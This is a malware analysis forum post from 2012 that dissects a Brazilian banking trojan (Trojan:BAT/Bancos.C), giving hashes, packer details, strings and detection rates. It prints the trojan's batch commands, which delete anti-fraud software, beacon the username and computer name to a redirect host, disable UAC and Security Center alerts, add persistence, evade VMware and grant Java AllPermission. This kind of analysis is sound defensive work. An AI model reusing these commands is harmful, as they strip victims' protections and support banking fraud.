A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #14617  by rkhunter
 Fri Jul 13, 2012 12:21 pm
Trojan:BAT/Bancos.C

SHA1: 6ad1feb9c700166dfc95f26ce6ca56633f9b7afc
MD5: bf3d246f192438279bec871feb4966d0


Under RarSFX + UPX.
Main payload in .bat script with obfuscated strings (rsrc section of unpacked).

Removes files:
del /f /q "%windir%\system32\scpVista.exe"
del /f /q "%windir%\system32\scpLIB.dll"
del /f /q "%windir%\system32\scpMIB.dll"
del /f /q "%windir%\system32\scpsssh2.dll"
del /f /q "%ProgramFiles%\Scpad\scpLIB.dll"
del /f /q "%ProgramFiles%\Scpad\scpMIB.dll"
del /f /q "%ProgramFiles%\Scpad\scpsssh2.dll"
del /f /q "%ProgramFiles%\Scpad\scpIBCfg.bin"
By googling I found that files belong to anti-malware/anti-fraud product of Brazilian company - Scopus Tecnologia.

Some strings
Overwrite?
Please enter the password.
Bitte w
hlen Sie einen Ordner zum Speichern der Dateien aus.
Fehler!
An unknown error occured. The program will be terminated.
\BDFINOPS
Error!
This program is not supported on this operating system.
open
berschreiben?
Fortfahren?
Continue?
The file
Einige Include Dateien konnten nicht erstellt werden.
Nicht gen
gend Speicher verf
gbar.
Ein unbekannter Fehler ist aufgetreten. Das Programm wird beendet.
Can not create some of your include files.
Password
Passwort
Falsches Passwort.
Can not allocate the memory.
existiert bereits im aktuellen Arbeitsverzeichnis.
berschreiben?
Das Programm wird von diesem Betriebssytem nicht unterst
tzt.
Choose a location to save the files.
Wrong password.
Die Datei
Bitte geben Sie das Passwort ein.
deutsch
already exists in the current directory. Overwrite?
Also can run IE and redirect user to special host:
start /low /min iexplore.exe "http://!_a_!/agoravai.php?a=%username%&b=%computername%")&&fsutil file createnew "%temp%\thunb.db" 666"
Deobfuscated string has view:
http://redir.updateflashplayer.com.br/a ... mputername%"
Disables security center:
%windir%\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
%windir%\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Microsoft Installer" /t REG_SZ /d "%temp%\_msimsn.exe" /f
%windir%\system32\reg.exe add "HKLM\Software\Microsoft\Security Center" /v AntiVirusDisableNotify /t REG_DWORD /d 0x00000001 /f
%windir%\system32\reg.exe add "HKLM\Software\Microsoft\Security Center" /v FirewallDisableNotify /t REG_DWORD /d 0x00000001 /f
%windir%\system32\reg.exe add "HKLM\Software\Microsoft\Security Center" /v UpdatesDisableNotify /t REG_DWORD /d 0x00000001 /f
%windir%\system32\reg.exe add "HAheAEa_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v DisableSR /t REG_DWORD /d 0x00000001 /f
VMware detection code.
REM @ipconfig /all|find "VMware"&&if errorlevel 0 exit
Makes some Java-enabled settings.
set java=permission java.security.AllPermission
for /f "tokens=*" %%E IN ('dir /b /s ^| find /i "java.policy"') DO echo grant { %java%;}; > "%%E"
...of course epic detection
dropper: 27 /42 https://www.virustotal.com/file/23a65ea ... /analysis/
unpacked: 10 / 40 https://www.virustotal.com/file/6cbb3a2 ... 342175161/
malicious batch script: 4 / 41 https://www.virustotal.com/file/47d9eb5 ... 342174705/
Attachments
pass:infected
(1.61 KiB) Downloaded 54 times
pass:infected
(20.22 KiB) Downloaded 47 times
pass:infected
(75.32 KiB) Downloaded 55 times